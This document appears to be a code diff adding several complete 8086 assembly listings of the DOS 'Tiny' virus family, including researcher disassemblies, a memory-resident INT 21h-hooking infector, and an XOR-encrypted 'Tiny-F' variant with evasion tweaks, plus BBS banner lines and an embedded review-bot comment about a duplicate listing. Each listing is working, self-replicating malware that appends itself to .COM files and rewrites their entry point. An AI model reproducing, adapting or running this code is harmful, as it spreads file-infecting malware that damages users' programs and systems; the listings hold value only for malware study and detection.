;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_2e equ 1ABh ; (946E:01AB=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
s proc far
start:
jmp loc_1 ; (0108)
db 0CDh, 20h, 7, 8, 9
loc_1:
call sub_1 ; (010B)
s endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
pop si
sub si,10Bh
mov bp,data_1[si] ; (946E:01A0=0)
add bp,103h
lea dx,[si+1A2h] ; Load effective addr
xor cx,cx ; Zero register
mov ah,4Eh ; 'N'
loc_2:
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_6 ; Jump if carry Set
mov dx,9Eh
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
mov ah,3Fh ; '?'
lea dx,[si+1A8h] ; Load effective addr
mov di,dx
mov cx,3
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
cmp byte ptr [di],0E9h
je loc_4 ; Jump if equal
loc_3:
mov ah,4Fh ; 'O'
jmp short loc_2 ; (0120)
loc_4:
mov dx,[di+1]
mov data_1[si],dx ; (946E:01A0=0)
xor cx,cx ; Zero register
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov dx,di
mov cx,2
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
cmp word ptr [di],807h
je loc_3 ; Jump if equal
xor dx,dx ; Zero register
xor cx,cx ; Zero register
mov ax,4202h
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
cmp dx,0
jne loc_3 ; Jump if not equal
cmp ah,0FEh
jae loc_3 ; Jump if above or =
mov ds:data_2e[si],ax ; (946E:01AB=0)
mov ah,40h ; '@'
lea dx,[si+105h] ; Load effective addr
mov cx,0A3h
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
jc loc_5 ; Jump if carry Set
mov ax,4200h
xor cx,cx ; Zero register
mov dx,1
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov ah,40h ; '@'
lea dx,[si+1ABh] ; Load effective addr
mov cx,2
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
loc_5:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_6:
jmp bp ;*Register jump
data_1 dw 0 ; Data table (indexed access)
db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0
sub_1 endp
seg_a ends
end start
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

@ -0,0 +1,177 @@
page ,132
name TINY167
title The 'Tiny' virus, version TINY-167
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-167 º
; º Disassembled by Vesselin Bontchev, July 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
call v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
pop si ; Determine the start addres of the virus body
add si,[si-2]
; Save the original first 4 bytes of the infected file on the stack:
push word ptr ds:[si-4]
push word ptr ds:[si-2]
push ax ; Save AX (to keep programs as DISKCOPY happy)
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len-2 ; CX := virus length
lodsw ; Check if virus is present in memory
scasw
je run ; Just run the program if so
; Virus not in memory. Install it there:
dec di ; Adjust DI
dec di
stosw ; Store the first word of the virus body
rep movsb ; Store the rest of the virus
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
mov cl,2 ; The vector is 2 words long
mov ax,int_21-first4+seg_60 ; Offset
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler:
vect_cpy:
xchg ax,word ptr es:[di-(32-21)*4]
stosw
mov ax,es ; Segment
loop vect_cpy ; Loop until done
run:
mov di,offset start ; Point DI at program start
pop ax ; Restore AX
pop word ptr ds:[di+2] ; Restore the original first 4 bytes
pop word ptr ds:[di] ; of the file
push ds ; ES := DS
pop es
jmp di ; Go
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
xchg bx,ax ; Save the file handle in BX
mov ah,3F ; Read the first 4 bytes of the file
mov cx,4 ; 4 bytes to read
mov dx,seg_60 ; Put them in first4
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov ax,4202 ; Seek to the end of file
xor cx,cx
xor dx,dx
int 32 ; Do it
push ax ; Save file length
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov ax,4200 ; Seek to the file beginning
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dx,di ; Point DX at first4
mov al,0E8 ; Near CALL opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the CALL's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov cl,4 ; Overwrite the first 4 bytes of the file
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
v_end equ $ ; End of virus body
code ends
end start


@ -0,0 +1,199 @@
page ,132
name TINY198
title The 'Tiny' virus, version TINY-198
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-198 º
; º Disassembled by Vesselin Bontchev, July 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-v_entry
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
v_entry:
call self ; Determine the start addres of the virus body
self:
pop si
sub si,3
push ax ; Save AX (to keep programs as DISKCOPY happy)
; Check whether the virus is already in memory and just run the program if so:
mov ah,0E9
int 21
mov di,seg_60 ; Point ES:DI at 0000:0600h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len ; CX := virus length
rep movsb ; Move the virus body there
; Transfer control to cont: by PUSHing its address
; on the stack and executing RETF:
push es
mov ax,cont-v_entry+seg_60
push ax
retf
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
; Resume execution from here (but already in segment 60h):
cont:
; Install new INT 21h handler and move the old one at INT 32h:
mov di,21*4
mov cl,2
mov ax,int_21-v_entry+seg_60
cld
lp:
push word ptr es:[di] ; Get old handler's address
pop word ptr es:[di+(32-21)*4] ; Move it at INT 32h
stosw ; Install the new one
mov ax,cs
loop lp ; Loop until done
; Save the original first 4 bytes of the infected program on the stack:
push word ptr cs:[first4-v_entry+seg_60]
push word ptr cs:[first4+2-v_entry+seg_60]
run_pgm:
mov di,offset start ; Point DI at program's start
pop word ptr [di+2] ; Restore the first 4 bytes of the program
pop word ptr [di]
pop ax ; Restore the original value of AX
push ds
push ds ; ES := DS
pop es
push di ; Push 100h on the stack
retf
mem_chk:
; Push the original first 4 bytes of the infected program on the stack:
push word ptr [si+first4-v_entry]
push word ptr [si+first4+2-v_entry]
jmp run_pgm ; And run the original program
int_21: ; New INT 21h handler
cmp ah,0E9 ; Memory check?
je mem_chk ; If infected, run the original program
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
mov bx,ax ; Save the file handle in BX
mov ah,3F ; Read the first 4 bytes of the file
mov cx,4 ; 4 bytes to read
mov dx,first4-v_entry+seg_60 ; Put them in first4
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov ax,4202 ; Seek to the end of file
xor cx,cx
xor dx,dx
int 32 ; Do it
push ax ; Save file length
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov ax,4200 ; Seek to the file beginning
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dx,di ; Point DX at first4
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
sub ax,3 ; Subtract 3 (first instruction length)
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov cl,4 ; Overwrite the first 4 bytes of the file
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
v_end equ $ ; End of virus body
code ends
end start


@ -0,0 +1,102 @@
PAGE ,132
tinyv SEGMENT BYTE PUBLIC 'code'
ASSUME CS:tinyv
ASSUME SS:tinyv
ASSUME DS:tinyv
H00000 DB 0
H00001 DB 255 DUP(?)
program PROC FAR
ASSUME ES:tinyv
begin:
JMP pgstart ; start program
exlbl LABEL BYTE
db 0CDh, 20h, 7, 8, 9
pgstart:
CALL tinyvir
mnprg PROC NEAR
tinyvir:
POP SI ; get SI for storage
SUB SI,offset tinyvir ; reset SI to virus start
MOV BP,[SI+blnkdat] ; store SI in BP for return
ADD BP,offset exlbl ; Add to get original offset
LEA DX,[SI+fspec] ; get filespec (*.COM)
SUB CX,CX ; || (clear regs)
MOV AH,4EH ; || (find files)
mainloop: ; \||/
INT 21H ; ----\/----
JC ack ; no more files found, terminate virus
MOV DX,009EH ; set file name pointer
MOV AX,3D02H ; open file
INT 21H ; do it!
MOV BX,AX ; move file handle to BX
MOV AH,3FH ; read file
JMP whatever
ack:
JMP nofile
whatever:
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
MOV DI,DX ; set Dest Index to area for buffer (?)
MOV CX,0003H ; read 3 bytes
INT 21H ; do it!
CMP BYTE PTR [DI],0E9H ; check for JMP at start
JE infect ; If begins w/JMP, Infect
nextfile:
MOV AH,4FH ; set int 21 to find next file
JMP mainloop ; next file, do it!
infect:
MOV DX,[DI+01H] ; set # of bytes to move
MOV [SI+blnkdat],DX ; " " " " " "
SUB CX,CX ; " " " " " " (0 here)
NOP
MOV AX,4200H ; move file
INT 21H ; do it!
MOV DX,DI ; set dest index to area for buffer (?)
MOV CX,0002H ; two bytes
NOP
MOV AH,3FH ; read file
INT 21H ; do it!
CMP WORD PTR [DI],0807H ; check for infection
JE nextfile ; next file if infected
NOP
SUB DX,DX ; clear regs
SUB CX,CX ; " "
MOV AX,4202H ; move file pointer
INT 21H ; do it!
CMP DX,00H ; new pointer location 0?
NOP
JNE nextfile ; if no then next file
CMP AH,0FEH ; new pointer loc too high?
JNC nextfile ; yes, try again
MOV [SI+offset endprog+3],AX; point to data
NOP
MOV AH,40H ; write instruction
LEA DX,[SI+0105H] ; write buffer loc |
MOV CX,offset endprog-105h ; (size of virus) --\|/--
INT 21H ; do it!
JC exit ; error, bug out
MOV AX,4200H ; move pointer
NOP
SUB CX,CX ; clear reg
MOV DX,OFFSET H00001 ; where to set pointer
NOP
INT 21H ; do it!
MOV AH,40H ; write to file
LEA DX,[SI+offset endprog+3]; write data at SI+1AB
NOP
MOV CX,0002H ; two bytes (the JMP)
INT 21H ; do it!
exit:
MOV AH,3EH ; close file
INT 21H ; do it!
nofile:
JMP BP ; go to original file
mnprg ENDP
program ENDP
blnkdat LABEL WORD
DW 0000H
fspec LABEL WORD
DB '*.COM'
DB 0
endprog LABEL WORD
tinyv ENDS
END program

@ -0,0 +1,101 @@
PAGE ,132
tinyv SEGMENT BYTE PUBLIC 'code'
ASSUME CS:tinyv
ASSUME SS:tinyv
ASSUME DS:tinyv
H00000 DB 0
H00001 DB 255 DUP(?)
program PROC FAR
ASSUME ES:tinyv
begin:
JMP pgstart ; start program
exlbl LABEL BYTE
db 0CDh, 20h, 7, 8, 9
pgstart:
CALL tinyvir
mnprg PROC NEAR
tinyvir:
POP SI ; get SI for storage
SUB SI,offset tinyvir ; reset SI to virus start
MOV BP,[SI+blnkdat] ; store SI in BP for return
ADD BP,offset exlbl ; Add to get original offset
LEA DX,[SI+fspec] ; get filespec (*.COM)
SUB CX,CX ; || (clear regs)
MOV AH,4EH ; || (find files)
mainloop: ; \||/
INT 21H ; ----\/----
JC hiccup ; no more files found, terminate virus
MOV DX,009EH ; set file name pointer
MOV AX,3D02H ; open file
INT 21H ; do it!
MOV BX,AX ; move file handle to BX
MOV AH,3FH ; read file
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
MOV DI,DX ; set Dest Index to area for buffer (?)
MOV CX,0003H ; read 3 bytes
INT 21H ; do it!
CMP BYTE PTR [DI],0E9H ; check for JMP at start
JE infect ; If begins w/JMP, Infect
nextfile:
MOV AH,4FH ; set int 21 to find next file
JMP mainloop ; next file, do it!
hiccup: JMP nofile
infect:
MOV AX,5700h ; get date function
INT 21h ; do it!
PUSH DX ; store date + time
PUSH CX
MOV DX,[DI+01H] ; set # of bytes to move
MOV [SI+blnkdat],DX ; " " " " " "
SUB CX,CX ; " " " " " " (0 here)
MOV AX,4200H ; move file
INT 21H ; do it!
MOV DX,DI ; set dest index to area for buffer (?)
MOV CX,0002H ; two bytes
MOV AH,3FH ; read file
INT 21H ; do it!
CMP WORD PTR [DI],0807H ; check for infection
JE nextfile ; next file if infected
SUB DX,DX ; clear regs
SUB CX,CX ; " "
MOV AX,4202H ; move file pointer
INT 21H ; do it!
CMP DX,00H ; new pointer location 0?
JNE nextfile ; if no then next file
CMP AH,0FEH ; new pointer loc too high?
JNC nextfile ; yes, try again
MOV [SI+offset endprog+3],AX; point to data
MOV AH,40H ; write instruction
LEA DX,[SI+0105H] ; write buffer loc |
MOV CX,offset endprog-105h ; (size of virus) --\|/--
INT 21H ; do it!
JC exit ; error, bug out
MOV AX,4200H ; move pointer
SUB CX,CX ; clear reg
MOV DX,OFFSET H00001 ; where to set pointer
INT 21H ; do it!
MOV AH,40H ; write to file
LEA DX,[SI+offset endprog+3]; write data at SI+1AB
MOV CX,0002H ; two bytes (the JMP)
INT 21H ; do it!
MOV AX,5701h ; store date
POP CX ; restore time
POP DX ; restore date
INT 21h ; do it!
exit:
MOV AH,3EH ; close file
INT 21H ; do it!
nofile:
JMP BP ; go to original file
mnprg ENDP
program ENDP
blnkdat LABEL WORD
DW 0000H
fspec LABEL WORD
DB '*.COM'
DB 0
endprog LABEL WORD
tinyv ENDS
END program

@ -0,0 +1,182 @@
tinyv SEGMENT BYTE PUBLIC 'code'
ASSUME CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv
ORG 100h
DOS EQU 21h
start: JMP pgstart
exlbl: db 0CDh, 20h, 7, 8, 9
pgstart:CALL tinyvir
tinyvir:
POP SI ; get SI for storage
SUB SI,offset tinyvir ; reset SI to virus start
MOV BP,[SI+blnkdat] ; store SI in BP for return
ADD BP, OFFSET exlbl
CALL endecrpt
JMP SHORT realprog
;-----------------------------------------------------------------------------
; nonencrypted subroutines start here
;-----------------------------------------------------------------------------
; PCM's encryption was stupid, mine is better - Dark Angel
endecrpt:
; Only need to save necessary registers - Dark Angel
PUSH AX ; store registers
PUSH BX
PUSH CX
PUSH SI
; New, better, more compact encryption engine
MOV BX, [SI+EN_VAL]
ADD SI, offset realprog
MOV CX, endenc - realprog
SHR CX, 1
JNC start_encryption
DEC SI
start_encryption:
MOV DI, SI
encloop:
LODSW ; DS:[SI] -> AX
XOR AX, BX
STOSW
LOOP encloop
POP SI ; restore registers
POP CX
POP BX
POP AX
RET
;-----end of encryption routine
nfect:
CALL endecrpt
MOV [SI+offset endprog+3],AX; point to data
MOV AH,40H ; write instruction
LEA DX,[SI+0105H] ; write buffer loc |
MOV CX,offset endprog-105h ; (size of virus) --\|/--
INT DOS ; do it!
PUSHF
CALL endecrpt
POPF
JC outa1 ; error, bug out
RET
outa1:
JMP exit
;-----------------------------------------------------------------------------
; Unencrypted routines end here
;-----------------------------------------------------------------------------
realprog:
CLD ; forward direction for string ops
; Why save DTA? This part killed. Saves quite a few bytes. Dark Angel
; Instead, set DTA to SI+ENDPROG+131h
MOV AH, 1Ah ; Set DTA
LEA DX, [SI+ENDPROG+131h] ; to DS:DX
INT 21h
LEA DX,[SI+fspec] ; get filespec (*.COM)
XOR CX, CX ; || (clear regs)
MOV AH,4EH ; || (find files)
mainloop: ; \||/
INT DOS ; ----\/----
JC hiccup ; no more files found, terminate virus
; Next part had to be changed to account for new DTA address - Dark Angel
LEA DX, [SI+ENDPROG+131h+30]; set file name pointer
; (offset 30 is DTA filename start)
MOV AX,3D02H ; open file
INT DOS ; do it!
MOV BX,AX ; move file handle to BX
MOV AH,3FH ; read file
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
MOV DI,DX ; set Dest Index to area for buffer
MOV CX,0003H ; read 3 bytes
INT DOS ; do it!
CMP BYTE PTR [DI],0E9H ; check for JMP at start
JE infect ; If begins w/JMP, Infect
nextfile:
MOV AH,4FH ; set int 21 to find next file
JMP mainloop ; next file, do it!
hiccup: JMP exit
infect:
MOV AX,5700h ; get date function
INT DOS ; do it!
PUSH DX ; store date + time
PUSH CX
MOV DX,[DI+01H] ; set # of bytes to move
MOV [SI+blnkdat],DX ; " " " " " "
; Tighter Code here - Dark Angel
XOR CX,CX ; " " " " " " (0 here)
MOV AX,4200H ; move file
INT DOS ; do it!
MOV DX,DI ; set dest index to area for buffer
MOV CX,0002H ; two bytes
MOV AH,3FH ; read file
INT DOS ; do it!
CMP WORD PTR [DI],0807H ; check for infection
JE nextfile ; next file if infected
getaval: ; encryption routine starts here
; My modifications here - Dark Angel
MOV AH, 2Ch ; DOS get TIME function
INT DOS ; do it!
OR DX, DX ; Is it 0?
JE getaval ; yeah, try again
MOV word ptr [si+offset en_val], DX ; Store it
; Tighter code here - Dark Angel
XOR DX,DX ; clear regs
XOR CX,CX ; " "
MOV AX,4202H ; move file pointer
INT DOS ; do it!
OR DX,DX ; new pointer location 0?
JNE nextfile ; if no then next file
CMP AH,0FEH ; new pointer loc too high?
JNC nextfile ; yes, try again
CALL nfect
MOV AX,4200H ; move pointer
XOR CX, CX ; clear reg
MOV DX,OFFSET 00001 ; where to set pointer
INT DOS ; do it!
MOV AH,40H ; write to file
LEA DX,[SI+offset endprog+3]; write data at SI+BUFFER
MOV CX,0002H ; two bytes (the JMP)
INT DOS ; do it!
MOV AX,5701h ; store date
POP CX ; restore time
POP DX ; restore date
INT DOS ; do it!
exit:
MOV AH,3EH ; close file
INT DOS ; do it!
; Return DTA to old position - Dark Angel
MOV AH, 1Ah ; Set DTA
MOV DX, 80h ; to PSP DTA
INT 21h
JMP BP
;-----------------------------------------------------------------------------
; encrypted data goes here
;-----------------------------------------------------------------------------
fspec LABEL WORD
DB '*.COM',0
nondata DB 'Tiny-F version 1.1' ; Program identification
DB '˜€×@&î·³½ë' ; author identification
DB 'Released 10-19-91' ; release date
endenc LABEL BYTE ; end of encryption zone
;-----------------------------------------------------------------------------
; nonencrypted data goes anywhere after here
;-----------------------------------------------------------------------------
blnkdat LABEL WORD
DW 0000H
; Only en_val is needed now because of new encryption mechanism
en_val DW 0h
endprog LABEL WORD
tinyv ENDS
END start

@ -0,0 +1,120 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ S ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 4-Aug-90 ÛÛ
;ÛÛ Version: ÛÛ
;ÛÛ Passes: 9 Analysis Options on: H ÛÛ
;ÛÛ ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_2e equ 1ABh ; (946E:01AB=0)
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
s proc far
start:
jmp loc_1 ; (0108)
db 0CDh, 20h, 7, 8, 9
loc_1:
call sub_1 ; (010B)
s endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
pop si
sub si,10Bh
mov bp,data_1[si] ; (946E:01A0=0)
add bp,103h
lea dx,[si+1A2h] ; Load effective addr
xor cx,cx ; Zero register
mov ah,4Eh ; 'N'
loc_2:
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_6 ; Jump if carry Set
mov dx,9Eh
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
mov ah,3Fh ; '?'
lea dx,[si+1A8h] ; Load effective addr
mov di,dx
mov cx,3
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
cmp byte ptr [di],0E9h
je loc_4 ; Jump if equal
loc_3:
mov ah,4Fh ; 'O'
jmp short loc_2 ; (0120)
loc_4:
mov dx,[di+1]
mov data_1[si],dx ; (946E:01A0=0)
xor cx,cx ; Zero register
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov dx,di
mov cx,2
mov ah,3Fh ; '?'
int 21h ; DOS Services ah=function 3Fh
; read file, cx=bytes, to ds:dx
cmp word ptr [di],807h
je loc_3 ; Jump if equal
xor dx,dx ; Zero register
xor cx,cx ; Zero register
mov ax,4202h
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
cmp dx,0
jne loc_3 ; Jump if not equal
cmp ah,0FEh
jae loc_3 ; Jump if above or =
mov ds:data_2e[si],ax ; (946E:01AB=0)
mov ah,40h ; '@'
lea dx,[si+105h] ; Load effective addr
mov cx,0A3h
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
jc loc_5 ; Jump if carry Set
mov ax,4200h
xor cx,cx ; Zero register
mov dx,1
int 21h ; DOS Services ah=function 42h
; move file ptr, cx,dx=offset
mov ah,40h ; '@'
lea dx,[si+1ABh] ; Load effective addr
mov cx,2
int 21h ; DOS Services ah=function 40h
; write file cx=bytes, to ds:dx
loc_5:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_6:
jmp bp ;*Register jump
data_1 dw 0 ; Data table (indexed access)
db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0
sub_1 endp
seg_a ends
end start
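Review bot: This file section appears to be a byte-for-byte duplicate of the listing added earlier in the same commit (the `PAGE 59,132` / `sub_1 proc near` disassembly at lines 10308–10412), differing only in the absence of the trailing BBS banner comments. An archive gains nothing from two copies of the same disassembly under different paths, and it complicates sample attribution for researchers. Either drop the duplicate or add a one-line header comment naming the variant and the reason it is kept separately, e.g. `; Duplicate of <earlier-path>; kept because <reason>` with the actual path filled in.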

@ -0,0 +1,94 @@
VSize=085h
Code Segment
Assume CS:Code
org 0
db 4Dh
jmp Start
Org 600h
Bytes db 0CDh,20h,90h,90h
Start: mov si, 0100h
mov bx, offset Int21
mov cx, 0050h
mov di, si
add si, [si+2]
push di
movsw
movsw
mov es, cx
cmpsb
je StartFile
dec si
dec di
rep movsw
mov es, cx
xchg ax, bx
xchg ax, cx
Loop0: xchg ax, cx
xchg ax, word ptr es:[di-120h]
stosw
jcxz Loop0
xchg ax, bx
StartFile:
push ds
pop es
ret
Int21: cmp ax, 4B00h
jne End21
Exec: push ax
push bx
push dx
push ds
push es
mov ax, 3D02h
call DoInt21
jc EndExec
cbw ;Zero AH
cwd ;Zero DX
mov bx, si ;Move handle to BX
mov ds, ax ;Set DS and ES to 60h,
mov es, ax ;the virus data segment
mov ah, 3Fh ;Read first 4 bytes
int 69h
mov al, 4Dh
scasb ;Check for 4D5Ah or infected file mark
je Close ;.EXE or already infected
mov al, 2
call LSeek ;Seek to the end, SI now contains file size
mov cl, VSize ;Virus size in CX, prepare to write
int 69h ;AH is 40h, i.e. Write operation
mov ax, 0E94Dh ;Virus header in AX
stosw ;Store it
xchg ax, si ;Move file size in AX
stosw ;Complete JMP instruction
xchg ax, dx ;Zero AX
call LSeek ;Seek to the beginning
int 69h ;AH is 40h, write the virus header
Close: mov ah,3Eh ;Close the file
int 69h
EndExec: pop es
pop ds
pop dx
pop bx
pop ax
End21: jmp dword ptr cs:[69h * 4]
LSeek: mov ah, 42h ;Seek operation
cwd ;Zero DX
DoInt21: xor cx, cx ;External entry for Open, zero cx
int 69h
mov cl, 4 ;4 bytes will be read/written
xchg ax, si ;Store AX in SI
mov ax, 4060h ;Prepare AH for Write
xor di, di ;Zero DI
ret
VLen = $ - offset Bytes
Code EndS
End
